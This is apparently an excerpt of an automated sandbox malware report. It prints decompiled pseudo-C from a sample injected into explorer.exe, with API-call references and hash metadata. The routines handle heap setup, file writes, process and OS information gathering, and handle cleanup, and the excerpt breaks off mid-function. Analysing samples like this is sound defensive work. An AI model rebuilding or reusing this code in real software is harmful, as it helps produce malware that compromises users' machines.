                            C-Code - Quality: 100%
                            			E000885EF() {
                            				void* _t1;
                            
                            				_t1 = HeapCreate(0, 0x80000, 0); // executed
                            				 *0x9e768 = _t1;
                            				return _t1;
                            			}





                            APIs
                            • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                            • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008F9BF(void* __edx) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				intOrPtr _t26;
                            				char _t27;
                            				intOrPtr _t29;
                            				void* _t31;
                            				void* _t36;
                            				char _t38;
                            				intOrPtr _t39;
                            				char _t42;
                            				intOrPtr _t51;
                            				intOrPtr _t52;
                            				intOrPtr* _t63;
                            				intOrPtr _t66;
                            				char* _t67;
                            				intOrPtr _t69;
                            				char _t78;
                            				void* _t81;
                            				void* _t82;
                            
                            				_t26 =  *0x9e654; // 0xc2fd20
                            				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                            				_v12 = _t27;
                            				if(_t27 != 0) {
                            					_t63 =  *0x9e654; // 0xc2fd20
                            					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                            						E000886E1(_t27,  *_t63, 0x400);
                            						_v8 = 0;
                            						_t36 = E0008109A(_t63, 0x34a);
                            						_t66 =  *0x9e688; // 0xb0000
                            						_t72 =  !=  ? 0x67d : 0x615;
                            						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                            						_push(0);
                            						_push(_t36);
                            						_t67 = "\\";
                            						_v24 = _t38;
                            						_push(_t67);
                            						_push(_t38);
                            						_t39 =  *0x9e688; // 0xb0000
                            						_push(_t67);
                            						_v20 = E000892E5(_t39 + 0x1020);
                            						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                            						_v16 = _t42;
                            						E000885D5( &_v24);
                            						E000885D5( &_v20);
                            						_t73 = _v16;
                            						_t82 = _t81 + 0x3c;
                            						_t69 = _v8;
                            						if(_v16 != 0 && _t69 > 0x400) {
                            							_t51 =  *0x9e654; // 0xc2fd20
                            							_t52 =  *((intOrPtr*)(_t51 + 4));
                            							_t53 =  <  ? _t69 : _t52;
                            							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                            							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                            							_t69 = _v8;
                            							_t82 = _t82 + 0xc;
                            						}
                            						E0008861A( &_v16, _t69);
                            						E0008861A( &_v20, 0xfffffffe);
                            						_t27 = _v12;
                            						_t81 = _t82 + 0x10;
                            						_t63 =  *0x9e654; // 0xc2fd20
                            					}
                            					_t78 = 0;
                            					while(1) {
                            						_t29 =  *0x9e688; // 0xb0000
                            						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                            						_t81 = _t81 + 0xc;
                            						if(_t31 >= 0) {
                            							break;
                            						}
                            						Sleep(1);
                            						_t78 = _t78 + 1;
                            						if(_t78 < 0x2710) {
                            							_t27 = _v12;
                            							_t63 =  *0x9e654; // 0xc2fd20
                            							continue;
                            						}
                            						break;
                            					}
                            					E0008861A( &_v12, 0);
                            				}
                            				return 0;
                            			}


























                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID:
                            • API String ID: 4201116106-0
                            • Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                            • Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                            				char _v8;
                            				WCHAR* _v12;
                            				signed int _v16;
                            				WCHAR* _v20;
                            				short _t30;
                            				short _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t43;
                            				intOrPtr _t45;
                            				short _t49;
                            				void* _t52;
                            				char _t71;
                            				WCHAR* _t72;
                            
                            				_v16 = _v16 & 0x00000000;
                            				_t71 = 0;
                            				_v12 = __ecx;
                            				_t49 = __edx;
                            				_v8 = 0;
                            				_t72 = E00088604(0x448);
                            				_v20 = _t72;
                            				_pop(_t52);
                            				if(_t72 != 0) {
                            					_t72[0x21a] = __edx;
                            					_t72[0x21c] = _a8;
                            					lstrcpynW(_t72, _v12, 0x200);
                            					if(_t49 != 1) {
                            						_t30 = E00088604(0x100000);
                            						_t72[0x212] = _t30;
                            						if(_t30 != 0) {
                            							_t69 = _a4;
                            							_t72[0x216] = 0x100000;
                            							if(_a4 != 0) {
                            								E000887EA(_t72, _t69);
                            							}
                            							L16:
                            							return _t72;
                            						}
                            						L7:
                            						if(_t71 != 0) {
                            							E0008861A( &_v8, 0);
                            						}
                            						L9:
                            						_t33 = _t72[0x218];
                            						if(_t33 != 0) {
                            							_t38 =  *0x9e684; // 0xc2f8f0
                            							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                            						}
                            						_t73 =  &(_t72[0x212]);
                            						if(_t72[0x212] != 0) {
                            							E0008861A(_t73, 0);
                            						}
                            						E0008861A( &_v20, 0);
                            						goto L1;
                            					}
                            					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                            					_t71 = _t43;
                            					_v8 = _t71;
                            					if(_t71 == 0) {
                            						goto L9;
                            					}
                            					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                            						goto L7;
                            					} else {
                            						_t45 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                            						_t72[0x218] = _t72[0x218] & 0x00000000;
                            						E0008861A( &_v8, 0);
                            						goto L16;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}

















                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpyn
                            • String ID:
                            • API String ID: 680773602-0
                            • Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                            • Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E0008E2C6(void* __fp0, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				void* _v24;
                            				void* _v28;
                            				char _v32;
                            				char _v544;
                            				signed int _t40;
                            				intOrPtr _t41;
                            				intOrPtr _t48;
                            				intOrPtr _t58;
                            				void* _t65;
                            				intOrPtr _t66;
                            				void* _t70;
                            				signed int _t73;
                            				void* _t75;
                            				void* _t77;
                            
                            				_t77 = __fp0;
                            				_v20 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				_t66 =  *0x9e6b4; // 0xc2fa98, executed
                            				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                            				if(_t40 == 0) {
                            					_t73 = 0;
                            					if(_v20 <= 0) {
                            						L9:
                            						_t41 =  *0x9e6b4; // 0xc2fa98
                            						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                            						return 0;
                            					}
                            					do {
                            						_v16 = 0;
                            						_v12 = 0;
                            						_t48 =  *0x9e68c; // 0xc2fab8
                            						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                            						_t70 = E00088604(_v16 + 1);
                            						if(_t70 != 0) {
                            							_v12 = 0x200;
                            							_push( &_v32);
                            							_push( &_v12);
                            							_push( &_v544);
                            							_push( &_v16);
                            							_push(_t70);
                            							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                            							_t58 =  *0x9e68c; // 0xc2fab8
                            							_push(0);
                            							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                            								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                            								_t75 = _t75 + 0xc;
                            								Sleep(0xa);
                            							}
                            						}
                            						_t73 = _t73 + 1;
                            					} while (_t73 < _v20);
                            					goto L9;
                            				}
                            				return _t40 | 0xffffffff;
                            			}






















                            APIs
                            • Sleep.KERNELBASE(0000000A), ref: 0008E394
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                            • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                            				intOrPtr _v8;
                            				signed int _v16;
                            				char _v20;
                            				void* _t24;
                            				char _t25;
                            				signed int _t30;
                            				intOrPtr* _t45;
                            				signed int _t46;
                            				void* _t47;
                            				void* _t54;
                            
                            				_t54 = __fp0;
                            				_t45 = __edx;
                            				_t46 = 0;
                            				_t30 = __ecx;
                            				if( *__edx > 0) {
                            					do {
                            						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                            						if(_t24 == 0) {
                            							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                            							_v8 = _t25;
                            							if(_t25 != 0) {
                            								L6:
                            								_v16 = _v16 & 0x00000000;
                            								_v20 = _t25;
                            								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                            								_t47 = _t47 + 0xc;
                            							} else {
                            								if(GetLastError() != 0xd) {
                            									_t25 = _v8;
                            									goto L6;
                            								} else {
                            									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                            								}
                            							}
                            						}
                            						_t46 = _t46 + 1;
                            					} while (_t46 <  *_t45);
                            				}
                            				return 0;
                            			}














                            APIs
                              • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                            • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                            • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E00085D7D(void* __eflags) {
                            				char _v44;
                            				intOrPtr _t7;
                            				intOrPtr _t10;
                            				void* _t11;
                            				WCHAR* _t12;
                            				WCHAR* _t13;
                            				WCHAR* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t19;
                            				intOrPtr _t22;
                            				void* _t27;
                            				WCHAR* _t28;
                            
                            				_t7 =  *0x9e688; // 0xb0000
                            				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                            				_t10 =  *0x9e684; // 0xc2f8f0
                            				_t28 = 2;
                            				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                            				if(_t11 == 0) {
                            					_t22 =  *0x9e688; // 0xb0000
                            					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                            					 *0x9e6ac = _t12;
                            					__eflags = _t12;
                            					if(_t12 != 0) {
                            						_t14 = E00089EBB();
                            						__eflags = _t14;
                            						if(_t14 == 0) {
                            							_t28 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t15 =  *0x9e688; // 0xb0000
                            							lstrcmpiW(_t15 + 0x228, _t14);
                            							asm("sbb esi, esi");
                            							_t28 = _t28 + 1;
                            						}
                            					}
                            					_t13 = _t28;
                            				} else {
                            					_t19 =  *0x9e684; // 0xc2f8f0
                            					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                            					_t13 = 3;
                            				}
                            				return _t13;
                            			}
















                            APIs
                            • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                            • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008BA05() {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _t15;
                            				void* _t16;
                            				void* _t18;
                            				void* _t21;
                            				intOrPtr _t22;
                            				void* _t24;
                            				void* _t30;
                            
                            				_v8 = _v8 & 0x00000000;
                            				_t15 =  *0x9e68c; // 0xc2fab8
                            				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                            				if(_t16 != 0) {
                            					_v12 = _v12 & 0x00000000;
                            					_t18 = E0008B998(1,  &_v12); // executed
                            					_t30 = _t18;
                            					if(_t30 != 0) {
                            						CloseHandle(_v8);
                            						_t21 = _t30;
                            					} else {
                            						if(_v8 != _t18) {
                            							_t22 =  *0x9e684; // 0xc2f8f0
                            							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                            						}
                            						_t21 = 0;
                            					}
                            					return _t21;
                            				} else {
                            					return _t16;
                            				}
                            			}













                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                            • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                            				void _v44;
                            				signed int _t8;
                            				intOrPtr _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t21;
                            				void* _t24;
                            				void* _t29;
                            				void* _t35;
                            
                            				_t35 = __eflags;
                            				_t24 = __ecx;
                            				_t8 =  *0x9e688; // 0xb0000
                            				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                            				E000885EF();
                            				E00088F78();
                            				 *0x9e780 = 0;
                            				 *0x9e784 = 0;
                            				 *0x9e77c = 0;
                            				E00085EB6(); // executed
                            				E0008CF84(_t24);
                            				_t14 =  *0x9e688; // 0xb0000
                            				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                            				_t15 =  *0x9e688; // 0xb0000
                            				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                            				E0008B337( &_v44);
                            				memset( &_v44, 0, 0x27);
                            				E00085C26( &_v44, __fp0);
                            				_t21 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                            				return 0;
                            			}












                            APIs
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                              • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                              • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                              • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                              • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                              • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            • memset.MSVCRT ref: 00085D5F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                            • String ID:
                            • API String ID: 4245722550-0
                            • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                            • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008861A(int _a4, intOrPtr _a8) {
                            				int _t3;
                            				intOrPtr _t4;
                            				void* _t9;
                            
                            				_t3 = _a4;
                            				if(_t3 == 0) {
                            					return _t3;
                            				}
                            				_t9 =  *_t3;
                            				if(_t9 != 0) {
                            					 *_t3 =  *_t3 & 0x00000000;
                            					_t4 = _a8;
                            					if(_t4 != 0xffffffff) {
                            						if(_t4 == 0xfffffffe) {
                            							_t4 = E0008C392(_t9);
                            						}
                            					} else {
                            						_t4 = E0008C379(_t9);
                            					}
                            					E0008874F(_t9, 0, _t4);
                            					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                            				}
                            				return _t3;
                            			}







                            APIs
                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                            • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				signed int _t5;
                            				void* _t6;
                            				void* _t10;
                            				long _t15;
                            				void* _t17;
                            
                            				_t15 = 2;
                            				_t5 = E0008A5F7(_a4, _t15);
                            				_t17 = _t5;
                            				if(_t17 != 0) {
                            					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                            					if(_t6 != 0) {
                            						CloseHandle(_t17);
                            						return 0;
                            					}
                            					_t10 = 0xfffffffe;
                            					return _t10;
                            				}
                            				return _t5 | 0xffffffff;
                            			}









                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                            • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E000898A6(void* __eflags, intOrPtr _a4) {
                            				intOrPtr _t24;
                            
                            				_t24 = _a4;
                            				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
                            					CloseHandle( *(_t24 + 0x1c));
                            					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                            					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                            						E0008984A(_t24, 1);
                            					}
                            					return  *((intOrPtr*)(_t24 + 0x18));
                            				}
                            				return 0;
                            			}





                            APIs
                            • CloseHandle.KERNELBASE(?), ref: 000898CA
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                            • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008B337(void* __ecx) {
                            				intOrPtr _t4;
                            				void* _t5;
                            				intOrPtr _t6;
                            				void* _t12;
                            				void* _t13;
                            
                            				_t4 =  *0x9e684; // 0xc2f8f0
                            				_t13 = 0;
                            				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                            				_t12 = _t5;
                            				if(_t12 != 0) {
                            					_t6 =  *0x9e684; // 0xc2f8f0
                            					_push(_t12);
                            					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                            						_t13 = 1;
                            					}
                            					CloseHandle(_t12);
                            					return _t13;
                            				}
                            				return _t5;
                            			}









                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                            • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 86%
                            			E0008D01F(void* __fp0) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				struct _SYSTEM_INFO _v52;
                            				char _v180;
                            				char _v692;
                            				char _v704;
                            				char _v2680;
                            				void* __esi;
                            				struct _OSVERSIONINFOA* _t81;
                            				intOrPtr _t83;
                            				void* _t84;
                            				long _t86;
                            				intOrPtr* _t88;
                            				intOrPtr _t90;
                            				intOrPtr _t95;
                            				intOrPtr _t97;
                            				void* _t98;
                            				intOrPtr _t103;
                            				char* _t105;
                            				void* _t108;
                            				char _t115;
                            				signed int _t117;
                            				char _t119;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t130;
                            				intOrPtr _t134;
                            				intOrPtr _t147;
                            				intOrPtr _t149;
                            				intOrPtr _t152;
                            				intOrPtr _t154;
                            				signed int _t159;
                            				struct HINSTANCE__* _t162;
                            				short* _t164;
                            				intOrPtr _t167;
                            				WCHAR* _t168;
                            				char* _t169;
                            				intOrPtr _t181;
                            				intOrPtr _t200;
                            				void* _t215;
                            				char _t218;
                            				void* _t219;
                            				char* _t220;
                            				struct _OSVERSIONINFOA* _t222;
                            				void* _t223;
                            				int* _t224;
                            				void* _t241;
                            
                            				_t241 = __fp0;
                            				_t162 =  *0x9e69c; // 0x10000000
                            				_t81 = E00088604(0x1ac4);
                            				_t222 = _t81;
                            				if(_t222 == 0) {
                            					return _t81;
                            				}
                            				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                            				_t83 =  *0x9e684; // 0xc2f8f0
                            				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                            				_t3 = _t222 + 0x648; // 0x648
                            				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                            				_t5 = _t222 + 0x1644; // 0x1644
                            				_t216 = _t5;
                            				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                            				_t227 = _t86;
                            				if(_t86 != 0) {
                            					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                            				}
                            				GetCurrentProcess();
                            				_t88 = E0008BA05();
                            				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                            				_t178 =  *_t88;
